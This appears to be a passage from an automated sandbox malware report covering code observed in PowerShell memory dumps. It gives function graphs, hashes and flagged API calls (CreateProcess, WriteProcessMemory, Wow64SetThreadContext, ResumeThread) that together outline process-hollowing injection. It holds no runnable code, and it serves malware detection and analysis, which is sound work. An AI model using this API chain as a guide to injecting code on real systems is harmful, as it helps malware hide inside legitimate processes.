                                    • Opcode Fuzzy Hash: dcdcba03f55aa2ef22f93fa55de90b83c27dda0ab71241ac15917546a79786bc
                                    • Instruction Fuzzy Hash: DFF19F7090DA9D8FDB99DF58C864BE9BBF0EF5A310F0500EEC049E72A2DA345985CB41
                                    Function 00007FFD9B8A7EDD Relevance: 1.7, APIs: 1, Instructions: 214injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 455 7ffd9b8a7edd-7ffd9b8a7ee9 456 7ffd9b8a7eeb-7ffd9b8a7ef3 455->456 457 7ffd9b8a7ef4-7ffd9b8a7fa1 455->457 456->457 460 7ffd9b8a7fc9-7ffd9b8a8062 WriteProcessMemory 457->460 461 7ffd9b8a7fa3-7ffd9b8a7fc6 457->461 462 7ffd9b8a806a-7ffd9b8a80c6 460->462 463 7ffd9b8a8064 460->463 461->460 463->462
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 41a8743586ec5f1b12f05326243ad35047fc645551a1f8d3cbc2b1ab9a95de54
                                    • Instruction ID: 6547089ea2dae2be972353736363c36b43c7e832f06443296a5d9eca2dfcda82
                                    • Opcode Fuzzy Hash: 41a8743586ec5f1b12f05326243ad35047fc645551a1f8d3cbc2b1ab9a95de54
                                    • Instruction Fuzzy Hash: C2611274908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB40
                                    Function 00007FFD9B8A79D9 Relevance: 1.7, APIs: 1, Instructions: 188threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 465 7ffd9b8a79d9-7ffd9b8a79e5 466 7ffd9b8a79e7-7ffd9b8a79ef 465->466 467 7ffd9b8a79f0-7ffd9b8a7aa4 465->467 466->467 469 7ffd9b8a7ac6-7ffd9b8a7b2f Wow64SetThreadContext 467->469 470 7ffd9b8a7aa6-7ffd9b8a7ac3 467->470 471 7ffd9b8a7b37-7ffd9b8a7b81 469->471 472 7ffd9b8a7b31 469->472 470->469 472->471
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: ce3b8cea95a3d626b41359a2639fad474c78014b5c75899ed51dd8335059cec1
                                    • Instruction ID: e98bfea04111b67a93b9baeee3e0b6ba5480a252f0304094a3f589a1b5f37957
                                    • Opcode Fuzzy Hash: ce3b8cea95a3d626b41359a2639fad474c78014b5c75899ed51dd8335059cec1
                                    • Instruction Fuzzy Hash: 6351BF70D0864D8FDB55DF98C884BE9BBF1FB5A310F1482AAD048D7266C7749885CF90
                                    Function 00007FFD9B8A80C9 Relevance: 1.6, APIs: 1, Instructions: 140threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 474 7ffd9b8a80c9-7ffd9b8a80d5 475 7ffd9b8a80d7-7ffd9b8a80df 474->475 476 7ffd9b8a80e0-7ffd9b8a81aa ResumeThread 474->476 475->476 479 7ffd9b8a81ac 476->479 480 7ffd9b8a81b2-7ffd9b8a81f0 476->480 479->480
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 2710b7cb123b5bfd3c0d48ef2d4102fb570ae785d6a1b0ac5e20e9d3b4718d17
                                    • Instruction ID: cd6cb4529f14f7f8f5791346a76261f397523e333b584773c72b8d04065944aa
                                    • Opcode Fuzzy Hash: 2710b7cb123b5bfd3c0d48ef2d4102fb570ae785d6a1b0ac5e20e9d3b4718d17
                                    • Instruction Fuzzy Hash: 8E418D7090C74C8FDB59DF98D885BA9BBF0FF5A310F1041AED049E7252DA70A846CB51
                                    Function 00007FFD9B971581 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c6e36103bd7d6d96baf1d35a7832ca2f7a6134f316bc3a26e79f1b773a277487
                                    • Instruction ID: 153d8fe903f4cf9612376e0b71fecae5ee132612db7ad346dabebca10e23c784
                                    • Opcode Fuzzy Hash: c6e36103bd7d6d96baf1d35a7832ca2f7a6134f316bc3a26e79f1b773a277487
                                    • Instruction Fuzzy Hash: 28416832F2FA5D1FEBB8CA9848A513537D2EF95718F0E027ED44DC71A2DE14AD068281
                                    Function 00007FFD9B970DA1 Relevance: .1, Instructions: 121COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 628 7ffd9b970da1-7ffd9b970dd4 630 7ffd9b970ef9-7ffd9b970f53 628->630 631 7ffd9b970dda-7ffd9b970de4 628->631 654 7ffd9b970f7e-7ffd9b970fa9 630->654 655 7ffd9b970f55-7ffd9b970f7c 630->655 632 7ffd9b970dfd-7ffd9b970e02 631->632 633 7ffd9b970de6-7ffd9b970df3 631->633 635 7ffd9b970e9a-7ffd9b970ea4 632->635 636 7ffd9b970e08-7ffd9b970e0b 632->636 633->632 642 7ffd9b970df5-7ffd9b970dfb 633->642 640 7ffd9b970eb3-7ffd9b970ef6 635->640 641 7ffd9b970ea6-7ffd9b970eb2 635->641 636->635 639 7ffd9b970e11-7ffd9b970e14 636->639 644 7ffd9b970e3b 639->644 645 7ffd9b970e16-7ffd9b970e39 639->645 640->630 642->632 649 7ffd9b970e3d-7ffd9b970e3f 644->649 645->649 649->635 652 7ffd9b970e41-7ffd9b970e4b 649->652 652->635 660 7ffd9b970e4d-7ffd9b970e63 652->660 666 7ffd9b970fab 654->666 667 7ffd9b970fac-7ffd9b970fbd 654->667 655->654 665 7ffd9b970e6a-7ffd9b970e73 660->665 668 7ffd9b970e8c-7ffd9b970e99 665->668 669 7ffd9b970e75-7ffd9b970e82 665->669 666->667 670 7ffd9b970fbf 667->670 671 7ffd9b970fc0-7ffd9b971059 667->671 669->668 674 7ffd9b970e84-7ffd9b970e8a 669->674 670->671 676 7ffd9b97105f-7ffd9b971069 671->676 677 7ffd9b9711ab-7ffd9b971207 671->677 674->668 679 7ffd9b971082-7ffd9b971087 676->679 680 7ffd9b97106b-7ffd9b971080 676->680 703 7ffd9b971232-7ffd9b97125b 677->703 704 7ffd9b971209-7ffd9b971230 677->704 683 7ffd9b97108d-7ffd9b971090 679->683 684 7ffd9b971148-7ffd9b971152 679->684 680->679 688 7ffd9b971092-7ffd9b9710a5 683->688 689 7ffd9b9710d9 683->689 686 7ffd9b971163-7ffd9b9711a8 684->686 687 7ffd9b971154-7ffd9b971162 684->687 686->677 688->677 697 7ffd9b9710ab-7ffd9b9710b5 688->697 691 7ffd9b9710db-7ffd9b9710dd 689->691 691->684 696 7ffd9b9710df-7ffd9b9710e2 691->696 696->684 699 7ffd9b9710e4-7ffd9b9710ea 696->699 701 7ffd9b9710ce-7ffd9b9710d7 697->701 702 7ffd9b9710b7-7ffd9b9710c4 697->702 705 7ffd9b9710ec-7ffd9b971107 699->705 706 7ffd9b971109-7ffd9b97111f 699->706 701->691 702->701 712 7ffd9b9710c6-7ffd9b9710cc 702->712 721 7ffd9b971262-7ffd9b971273 703->721 722 7ffd9b97125d 703->722 704->703 705->706 714 7ffd9b971121-7ffd9b97112e 706->714 715 7ffd9b971138-7ffd9b971147 706->715 712->701 714->715 723 7ffd9b971130-7ffd9b971136 714->723 725 7ffd9b97127a-7ffd9b971309 721->725 726 7ffd9b971275 721->726 722->721 724 7ffd9b97125f 722->724 723->715 724->721 732 7ffd9b97130f-7ffd9b971319 725->732 733 7ffd9b971458-7ffd9b9714b4 725->733 726->725 727 7ffd9b971277 726->727 727->725 734 7ffd9b971332-7ffd9b971337 732->734 735 7ffd9b97131b-7ffd9b971330 732->735 756 7ffd9b9714df-7ffd9b971507 733->756 757 7ffd9b9714b6-7ffd9b9714dd 733->757 737 7ffd9b97133d-7ffd9b971340 734->737 738 7ffd9b9713f5-7ffd9b9713ff 734->738 735->734 742 7ffd9b971342-7ffd9b971355 737->742 743 7ffd9b971389 737->743 740 7ffd9b971401-7ffd9b97140f 738->740 741 7ffd9b971410-7ffd9b971455 738->741 741->733 742->733 754 7ffd9b97135b-7ffd9b971365 742->754 745 7ffd9b97138b-7ffd9b97138d 743->745 745->738 749 7ffd9b97138f-7ffd9b971392 745->749 749->738 752 7ffd9b971394-7ffd9b97139a 749->752 758 7ffd9b97139c-7ffd9b9713b7 752->758 759 7ffd9b9713b9-7ffd9b9713cc 752->759 760 7ffd9b97137e-7ffd9b971387 754->760 761 7ffd9b971367-7ffd9b971374 754->761 776 7ffd9b97150e-7ffd9b97151f 756->776 777 7ffd9b971509 756->777 757->756 758->759 770 7ffd9b9713ce-7ffd9b9713db 759->770 771 7ffd9b9713e5-7ffd9b9713f4 759->771 760->745 761->760 768 7ffd9b971376-7ffd9b97137c 761->768 768->760 770->771 778 7ffd9b9713dd-7ffd9b9713e3 770->778 780 7ffd9b971521 776->780 781 7ffd9b971526-7ffd9b9715bf 776->781 777->776 779 7ffd9b97150b 777->779 778->771 779->776 780->781 782 7ffd9b971523 780->782 789 7ffd9b971759-7ffd9b9717b7 781->789 790 7ffd9b9715c5-7ffd9b9715cf 781->790 782->781 815 7ffd9b9717e2-7ffd9b971805 789->815 816 7ffd9b9717b9-7ffd9b9717e0 789->816 791 7ffd9b9715d1-7ffd9b9715df 790->791 792 7ffd9b9715e9-7ffd9b9715ef 790->792 791->792 798 7ffd9b9715e1-7ffd9b9715e7 791->798 795 7ffd9b9716ee-7ffd9b9716f8 792->795 796 7ffd9b9715f5-7ffd9b9715f8 792->796 799 7ffd9b97170b-7ffd9b971756 795->799 800 7ffd9b9716fa-7ffd9b97170a 795->800 801 7ffd9b971641 796->801 802 7ffd9b9715fa-7ffd9b97160d 796->802 798->792 799->789 804 7ffd9b971643-7ffd9b971645 801->804 802->789 813 7ffd9b971613-7ffd9b97161d 802->813 804->795 806 7ffd9b97164b-7ffd9b97164e 804->806 806->795 810 7ffd9b971654-7ffd9b971657 806->810 810->795 814 7ffd9b97165d-7ffd9b97169b 810->814 817 7ffd9b97161f-7ffd9b971634 813->817 818 7ffd9b971636-7ffd9b97163f 813->818 814->795 835 7ffd9b97169d-7ffd9b9716a3 814->835 828 7ffd9b971811-7ffd9b97181d 815->828 829 7ffd9b971807-7ffd9b97180d 815->829 816->815 817->818 818->804 831 7ffd9b97181f-7ffd9b971825 828->831 832 7ffd9b971829-7ffd9b9718a4 828->832 829->828 831->832 844 7ffd9b9718eb-7ffd9b9718f5 832->844 845 7ffd9b9718a6-7ffd9b9718e8 832->845 836 7ffd9b9716c2-7ffd9b9716d8 835->836 837 7ffd9b9716a5-7ffd9b9716c0 835->837 840 7ffd9b9716de-7ffd9b9716ed 836->840 837->836 846 7ffd9b971900-7ffd9b97194b 844->846 847 7ffd9b9718f7-7ffd9b9718ff 844->847 845->844
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ccf6dec0766172d12cadafa467e13bb335f3231a33b3e20aec57a502482c089
                                    • Instruction ID: 37e282d537dddfa4d44c57340f793b8da0e660e00bc86feb19167144ccb45953
                                    • Opcode Fuzzy Hash: 1ccf6dec0766172d12cadafa467e13bb335f3231a33b3e20aec57a502482c089
                                    • Instruction Fuzzy Hash: 8331E622F3FF0D1BEBB4979818E56B86BC1EF94B11F4A017AE45DC31A2ED14AD024281
                                    Function 00007FFD9B97085A Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 015ec822a98bafc4e7876018c90f70248864feafcd5d4b319e5f038715a6a224
                                    • Instruction ID: c8b9e66d788ef0ecca925fca794ba0d6ef842ddd9a60213b471c3a772e180259
                                    • Opcode Fuzzy Hash: 015ec822a98bafc4e7876018c90f70248864feafcd5d4b319e5f038715a6a224
                                    • Instruction Fuzzy Hash: 8931C222F2FA8E1BFBB9A3A814B52B866C1EF55B94B1900FAD45DC31E3ED0D5D004341

                                    Executed Functions

                                    Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1976439811.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

                                    Executed Functions

                                    Function 00007FFD9B8B34B5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.2972546934.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction ID: 79df91dbeca4578efdafbcff0581408dee29dbd6cc9aa5e7bb99ce125f81f538
                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction Fuzzy Hash: 1D01A73020CB0C4FD748EF0CE451AA6B3E0FB99320F10056EE58AC36A1D632E882CB41

                                    Execution Graph

                                    Execution Coverage:17.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:12
                                    Total number of Limit Nodes:0

                                    Executed Functions

                                    Function 00007FFD9B950F5B Relevance: .8, Instructions: 838COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 281 7ffd9b950f5b-7ffd9b950f99 284 7ffd9b950f9f-7ffd9b950fa9 281->284 285 7ffd9b9510e8-7ffd9b951115 281->285 286 7ffd9b950fc2-7ffd9b950fc7 284->286 287 7ffd9b950fab-7ffd9b950fc0 284->287 297 7ffd9b95112a-7ffd9b951144 285->297 298 7ffd9b951117-7ffd9b951128 285->298 290 7ffd9b950fcd-7ffd9b950fd0 286->290 291 7ffd9b951085-7ffd9b95108f 286->291 287->286 295 7ffd9b950fd2-7ffd9b950fe5 290->295 296 7ffd9b951019 290->296 293 7ffd9b951091-7ffd9b95109f 291->293 294 7ffd9b9510a0-7ffd9b9510e5 291->294 294->285 295->285 309 7ffd9b950feb-7ffd9b950ff5 295->309 300 7ffd9b95101b-7ffd9b95101d 296->300 312 7ffd9b95116f-7ffd9b951197 297->312 313 7ffd9b951146-7ffd9b95116d 297->313 298->297 300->291 303 7ffd9b95101f-7ffd9b951022 300->303 303->291 306 7ffd9b951024-7ffd9b95102a 303->306 310 7ffd9b951049-7ffd9b95105c 306->310 311 7ffd9b95102c-7ffd9b951047 306->311 314 7ffd9b95100e-7ffd9b951017 309->314 315 7ffd9b950ff7-7ffd9b951004 309->315 324 7ffd9b95105e-7ffd9b95106b 310->324 325 7ffd9b951075-7ffd9b951084 310->325 311->310 331 7ffd9b95119e-7ffd9b9511af 312->331 332 7ffd9b951199 312->332 313->312 314->300 315->314 320 7ffd9b951006-7ffd9b95100c 315->320 320->314 324->325 330 7ffd9b95106d-7ffd9b951073 324->330 330->325 334 7ffd9b9511b1 331->334 335 7ffd9b9511b6-7ffd9b9511ec 331->335 332->331 333 7ffd9b95119b 332->333 333->331 334->335 337 7ffd9b9511b3 334->337 339 7ffd9b9511ee-7ffd9b9511f4 335->339 340 7ffd9b9511ff-7ffd9b951206 335->340 337->335 341 7ffd9b9511f6-7ffd9b9511fd 339->341 342 7ffd9b951207-7ffd9b95124f 339->342 340->342 341->340 345 7ffd9b9513e9-7ffd9b951418 342->345 346 7ffd9b951255-7ffd9b95125f 342->346 359 7ffd9b95142a-7ffd9b951447 345->359 360 7ffd9b95141a-7ffd9b951428 345->360 347 7ffd9b951261-7ffd9b95126f 346->347 348 7ffd9b951279-7ffd9b95127f 346->348 347->348 353 7ffd9b951271-7ffd9b951277 347->353 350 7ffd9b95137e-7ffd9b951388 348->350 351 7ffd9b951285-7ffd9b951288 348->351 354 7ffd9b95138a-7ffd9b95139a 350->354 355 7ffd9b95139b-7ffd9b9513e6 350->355 356 7ffd9b9512d1 351->356 357 7ffd9b95128a-7ffd9b95129d 351->357 353->348 355->345 361 7ffd9b9512d3-7ffd9b9512d5 356->361 357->345 371 7ffd9b9512a3-7ffd9b9512ad 357->371 373 7ffd9b951472-7ffd9b951495 359->373 374 7ffd9b951449-7ffd9b951470 359->374 360->359 361->350 364 7ffd9b9512db-7ffd9b9512de 361->364 364->350 368 7ffd9b9512e4-7ffd9b9512e7 364->368 368->350 372 7ffd9b9512ed-7ffd9b95132b 368->372 375 7ffd9b9512af-7ffd9b9512c4 371->375 376 7ffd9b9512c6-7ffd9b9512cf 371->376 372->350 394 7ffd9b95132d-7ffd9b951333 372->394 387 7ffd9b9514a1-7ffd9b9514ad 373->387 388 7ffd9b951497-7ffd9b95149d 373->388 374->373 375->376 376->361 389 7ffd9b9514af-7ffd9b9514b5 387->389 390 7ffd9b9514b9-7ffd9b951534 387->390 388->387 389->390 392 7ffd9b95157b-7ffd9b951585 390->392 393 7ffd9b951536-7ffd9b951578 390->393 396 7ffd9b951590-7ffd9b9515db 392->396 397 7ffd9b951587-7ffd9b95158f 392->397 393->392 398 7ffd9b951352-7ffd9b951368 394->398 399 7ffd9b951335-7ffd9b951350 394->399 403 7ffd9b95136e-7ffd9b95137d 398->403 399->398
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a542a0399b78a340e200d4ff5d51f575c137fbc87cf4cf8e76bb17e4263650b0
                                    • Instruction ID: 153a5fa226c954095f49475f3441dae1b58388d739be0d8d646f943291edc40d
                                    • Opcode Fuzzy Hash: a542a0399b78a340e200d4ff5d51f575c137fbc87cf4cf8e76bb17e4263650b0
                                    • Instruction Fuzzy Hash: 62327A31B5EB8D1FE76A97A858615743BE1EF87214B0901FBD88DC71E3DA58AC06C341
                                    Function 00007FFD9B8874E4 Relevance: 2.0, APIs: 1, Instructions: 470processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: e52fc6ad44d893366047ba43bbd7359b3d590f0c1eb072a8655e3415d313fb8c
                                    • Instruction ID: de5e525fda41b035b5ba6e1ad2287aa9347b44f861b570013ecf1de2606e883d
                                    • Opcode Fuzzy Hash: e52fc6ad44d893366047ba43bbd7359b3d590f0c1eb072a8655e3415d313fb8c
                                    • Instruction Fuzzy Hash: CDF19F7090DA9D8FDB99DF18C865BE9BBF0EF1A310F0501EEC049E72A2DA745985CB41
                                    Function 00007FFD9B887D4D Relevance: 1.9, APIs: 1, Instructions: 397injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: e39dd7a4589b3ddf8ee8a229759dc5d601b09a28c238111000b7d6b397ab7068
                                    • Instruction ID: 29e3b7931d2769ed52a37c3fe93d5c1ad04c22296d8022f64a3ff384818e2325
                                    • Opcode Fuzzy Hash: e39dd7a4589b3ddf8ee8a229759dc5d601b09a28c238111000b7d6b397ab7068
                                    • Instruction Fuzzy Hash: 8DC12374908A5C8FDBA8DF58C894BE9BBF1FB6A310F1041AED04DE3251DB74A985CB44
                                    Function 00007FFD9B8879E9 Relevance: 1.7, APIs: 1, Instructions: 188threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: c5a4181172ff1da0a446ae1b3aa828affa8134350ea65c2167bba45d1efe2b1e
                                    • Instruction ID: 81a5c037c783f09810b686cd64becdca743d6db7826f8b4bcbef1dd9eeeac29f
                                    • Opcode Fuzzy Hash: c5a4181172ff1da0a446ae1b3aa828affa8134350ea65c2167bba45d1efe2b1e
                                    • Instruction Fuzzy Hash: EE51BE70D08A4D8FDB55DFA8C884BE9BBF1FB5A311F1082AAD048D7266D7749485CF40
                                    Function 00007FFD9B8880D9 Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 59 7ffd9b8880d9-7ffd9b8880e5 60 7ffd9b8880e7-7ffd9b8880ef 59->60 61 7ffd9b8880f0-7ffd9b8881ba ResumeThread 59->61 60->61 64 7ffd9b8881bc 61->64 65 7ffd9b8881c2-7ffd9b888200 61->65 64->65
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: e8a5b8ada2e86c95ad5192d06c222ac97cb63900add309773bcdb7fc215c129a
                                    • Instruction ID: 4602f4b3e48a09c1a1e914b48237b9a543f8a0edcac46491062d85257e4280e0
                                    • Opcode Fuzzy Hash: e8a5b8ada2e86c95ad5192d06c222ac97cb63900add309773bcdb7fc215c129a
                                    • Instruction Fuzzy Hash: 6A415E30A08B4C8FDB59DF98D895BADBBF0FF5A310F1041AED059D7292DA70A846CB41
                                    Function 00007FFD9B9509F5 Relevance: .7, Instructions: 682COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 409 7ffd9b9509f5-7ffd9b950a28 411 7ffd9b950a2a 409->411 412 7ffd9b950a2c-7ffd9b950a64 409->412 411->412 415 7ffd9b950b89-7ffd9b950be3 412->415 416 7ffd9b950a6a-7ffd9b950a74 412->416 440 7ffd9b950c0e-7ffd9b950c39 415->440 441 7ffd9b950be5-7ffd9b950c0c 415->441 417 7ffd9b950a8d-7ffd9b950a92 416->417 418 7ffd9b950a76-7ffd9b950a83 416->418 419 7ffd9b950b2a-7ffd9b950b34 417->419 420 7ffd9b950a98-7ffd9b950a9b 417->420 418->417 427 7ffd9b950a85-7ffd9b950a8b 418->427 425 7ffd9b950b43-7ffd9b950b86 419->425 426 7ffd9b950b36-7ffd9b950b42 419->426 420->419 423 7ffd9b950aa1-7ffd9b950aa4 420->423 428 7ffd9b950acb-7ffd9b950acc 423->428 429 7ffd9b950aa6-7ffd9b950ac9 423->429 425->415 427->417 434 7ffd9b950acd-7ffd9b950acf 428->434 429->434 434->419 437 7ffd9b950ad1-7ffd9b950adb 434->437 437->419 446 7ffd9b950add-7ffd9b950aeb 437->446 452 7ffd9b950c3b 440->452 453 7ffd9b950c3c-7ffd9b950c4d 440->453 441->440 448 7ffd9b950aed-7ffd9b950af3 446->448 449 7ffd9b950aca 446->449 454 7ffd9b950afa-7ffd9b950b03 448->454 449->428 452->453 455 7ffd9b950c4f 453->455 456 7ffd9b950c50-7ffd9b950c88 453->456 457 7ffd9b950b1c-7ffd9b950b29 454->457 458 7ffd9b950b05-7ffd9b950b12 454->458 455->456 461 7ffd9b950c8a-7ffd9b950c93 456->461 462 7ffd9b950c95-7ffd9b950ce9 456->462 458->457 463 7ffd9b950b14-7ffd9b950b1a 458->463 461->462 465 7ffd9b950cef-7ffd9b950cf9 462->465 466 7ffd9b950e3b-7ffd9b950e97 462->466 463->457 468 7ffd9b950d12-7ffd9b950d17 465->468 469 7ffd9b950cfb-7ffd9b950d10 465->469 494 7ffd9b950ec2-7ffd9b950eeb 466->494 495 7ffd9b950e99-7ffd9b950ec0 466->495 470 7ffd9b950d1d-7ffd9b950d20 468->470 471 7ffd9b950dd8-7ffd9b950de2 468->471 469->468 474 7ffd9b950d22-7ffd9b950d35 470->474 475 7ffd9b950d69 470->475 477 7ffd9b950df3-7ffd9b950e38 471->477 478 7ffd9b950de4-7ffd9b950df2 471->478 474->466 488 7ffd9b950d3b-7ffd9b950d45 474->488 482 7ffd9b950d6b-7ffd9b950d6d 475->482 477->466 482->471 485 7ffd9b950d6f-7ffd9b950d72 482->485 485->471 486 7ffd9b950d74-7ffd9b950d7a 485->486 490 7ffd9b950d99-7ffd9b950daf 486->490 491 7ffd9b950d7c-7ffd9b950d97 486->491 492 7ffd9b950d5e-7ffd9b950d67 488->492 493 7ffd9b950d47-7ffd9b950d54 488->493 504 7ffd9b950db1-7ffd9b950dbe 490->504 505 7ffd9b950dc8-7ffd9b950dd7 490->505 491->490 492->482 493->492 502 7ffd9b950d56-7ffd9b950d5c 493->502 510 7ffd9b950ef2-7ffd9b950f03 494->510 511 7ffd9b950eed 494->511 495->494 502->492 504->505 512 7ffd9b950dc0-7ffd9b950dc6 504->512 514 7ffd9b950f0a-7ffd9b950f44 510->514 515 7ffd9b950f05 510->515 511->510 513 7ffd9b950eef 511->513 512->505 513->510 515->514 516 7ffd9b950f07 515->516 516->514
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25dc77bd230a1d217c7f07ff14372adc6e01b0ca2bb2e3ad61dd009bbb4dc0ee
                                    • Instruction ID: c259c64ab048d672d906c99ca2d4028258ba1aaf810e7082eb9dee2c9742286b
                                    • Opcode Fuzzy Hash: 25dc77bd230a1d217c7f07ff14372adc6e01b0ca2bb2e3ad61dd009bbb4dc0ee
                                    • Instruction Fuzzy Hash: 54125422B5EB8D1FE76687A858255B53FE1EF57610B0A01FBD88CC71E3D908AD06C352
                                    Function 00007FFD9B950529 Relevance: .2, Instructions: 150COMMON
